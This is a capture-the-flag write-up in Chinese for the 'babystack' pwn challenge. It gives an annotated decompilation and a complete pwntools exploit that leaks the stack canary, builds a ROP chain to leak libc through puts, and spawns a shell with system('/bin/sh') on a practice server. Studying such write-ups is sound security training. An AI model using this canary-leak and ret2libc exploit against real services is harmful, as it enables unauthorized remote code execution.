
others_babystack

环境:Ubuntu 16.04(glibc 2.23)。题目来源:https://github.com/bash-c/pwn_repo


0x01


checksec

[*] '/home/zelas/Desktop/pwn/others_babystack/babystack'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

IDA

main()

// IDA decompilation of babystack's main(): a menu loop over one fixed-size
// stack buffer. The bug is option 1: read(0, s, 0x100) accepts up to 256
// bytes into the 136-byte buffer `s`, so it overruns the canary copy at
// [rbp-8] (v6), the saved rbp and the return address. Option 2 prints `s`
// with puts(), which has no length bound and stops only at the first NUL,
// so a buffer filled without a terminator leaks the canary and the stack
// words after it. Option 3 returns from main, which is what makes an
// overwritten return address take effect.
__int64 __fastcall main(int a1, char **a2, char **a3)
{
    int v3; // eax
    char s[136]; // [rsp+10h] [rbp-90h] BYREF  -- 0x88 bytes from s to the canary copy
    unsigned __int64 v6; // [rsp+98h] [rbp-8h]  -- stack canary copy, checked on return

    v6 = __readfsqword(0x28u);       // canary loaded from TLS (fs:0x28)
    setvbuf(stdin, 0LL, 2, 0LL);     // mode 2 is _IONBF on glibc: unbuffered stdio
    setvbuf(stdout, 0LL, 2, 0LL);
    setvbuf(stderr, 0LL, 2, 0LL);
    memset(s, 0, 0x80uLL);           // NOTE: clears only 0x80 of the 136 bytes of s
    while ( 1 )
    {
        sub_4008B9();                // presumably prints the menu (body not shown)
        v3 = sub_400841();           // presumably reads the menu choice (body not shown)
        switch ( v3 )
        {
            case 2: // print buffer -- leak primitive: puts() runs until the first NUL
                puts(s);
                break;
            case 3: // exit -- the only path that returns, i.e. triggers the overwritten return address
                return 0LL;
            case 1: // read(): stack overflow -- 0x100 bytes into a 136-byte buffer, no terminator added
                read(0, s, 0x100uLL);
                break;
            default:
                sub_400826("invalid choice");   // presumably a print helper
                break;
        }
        sub_400826(&unk_400AE7);     // presumably prints a separator/prompt string
    }
}

0x02


思路:ret2libc(开启了 canary,必须先泄露 canary 再做 ROP)

1. 先泄露 canary:用选项 1 填满 136 字节(0x88)缓冲区,sendline 附带的 '\n' 正好覆盖掉 canary 最低位的 \x00,再用选项 2 的 puts 把 canary 剩余 7 个字节打印出来

2. 泄露 write:带上正确的 canary 再次溢出,布置 pop rdi; ret + puts@plt 打印 write 的 GOT 表项,最后返回 main 以便再溢出一次;选项 3 触发 main 返回

3. 用 write 的真实地址减去 libc 中的偏移得到 libc 基址,进而计算 system 和 "/bin/sh" 地址

4. 再次溢出,执行 system("/bin/sh")

0x03


from pwn import *

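context(os='linux', arch='amd64', log_level='debug')
io = remote('node4.buuoj.cn', 28052)
path = './babystack'
# io = process([path])
elf = ELF(path)
# All libc offsets come from this file; it must be the exact libc the target
# runs (Ubuntu 16.04 / glibc 2.23), otherwise system and "/bin/sh" are wrong.
libc = ELF('libc-2.23.so')

# Layout from the decompiled main(): s lives at [rbp-0x90] and the canary copy
# at [rbp-0x8], so 0x88 bytes of filler end exactly at the canary's first byte.
padding1 = 0x88

# --- 1. leak the canary ------------------------------------------------------
# Fill s completely; sendline's trailing '\n' lands on the canary's low byte,
# which glibc keeps at 0x00, so puts(s) (option 2) no longer stops there and
# prints the other 7 canary bytes (and whatever follows, up to the next NUL).
payload1 = flat(b'a' * padding1)
io.sendlineafter(b'>>', b'1')
io.sendline(payload1)
io.sendlineafter(b'>>', b'2')
io.recvuntil(b'a\n')  # consume the filler and the '\n' that replaced canary byte 0
# recvn() blocks for exactly 7 bytes; recv(7) may return fewer and silently
# yield a truncated canary, which then fails the stack check on return.
canary = u64(io.recvn(7).rjust(8, b'\x00'))  # put the known 0x00 low byte back
log.success('Canary --> %#x', canary)

# --- 2. leak a libc address --------------------------------------------------
# No PIE (checksec), so gadget, PLT and GOT addresses are fixed.
pop_rdi_ret = 0x400a93  # pop rdi ; ret
puts_plt = elf.plt['puts']
write_got = elf.got['write']
main_addr = 0x400908    # return to main() afterwards so we get a third overflow
# Frame after leave/ret: [filler][canary][saved rbp][pop rdi][write_got][puts][main]
payload2 = flat(b'a' * padding1, canary, 0, pop_rdi_ret, write_got, puts_plt, main_addr)
io.sendlineafter(b">>", b'1')
io.sendline(payload2)
io.sendlineafter(b">>", b'3')  # option 3 returns from main -> ROP chain runs

# Whatever trails ">>" in the prompt is still pending; drain it before the leak.
# This drain is a race (the leaked bytes may already be in the same chunk);
# the checks below fail fast instead of letting a bad read poison libc_base.
io.recv()
write_addr = u64(io.recvn(6).ljust(8, b'\x00'))  # puts() stops at the address's NUL high bytes
if write_addr >> 40 != 0x7f:  # x86-64 Linux maps libc at 0x7fxx_xxxx_xxxx under normal ASLR
    log.warning('write leak looks suspicious: %#x (prompt drain mis-synchronised?)', write_addr)
log.success('write_addr --> %#x', write_addr)

libc_base = write_addr - libc.symbols['write']
if libc_base & 0xfff:  # libc is page-mapped; unaligned base => wrong libc file or bad leak
    log.error('libc base %#x is not page-aligned - wrong libc-2.23.so or bad leak', libc_base)
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

# --- 3. system("/bin/sh") ----------------------------------------------------
# system is entered via ret with no extra alignment gadget; that works on this
# glibc 2.23 target. If a movaps crash appears on another libc, insert a plain
# `ret` (pop_rdi_ret + 1) before `system` to re-align the stack.
payload3 = flat(b'a' * padding1, canary, 0, pop_rdi_ret, binsh, system)
io.sendlineafter(b">>", b'1')
io.sendline(payload3)
io.sendlineafter(b">>", b'3')
io.interactive()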

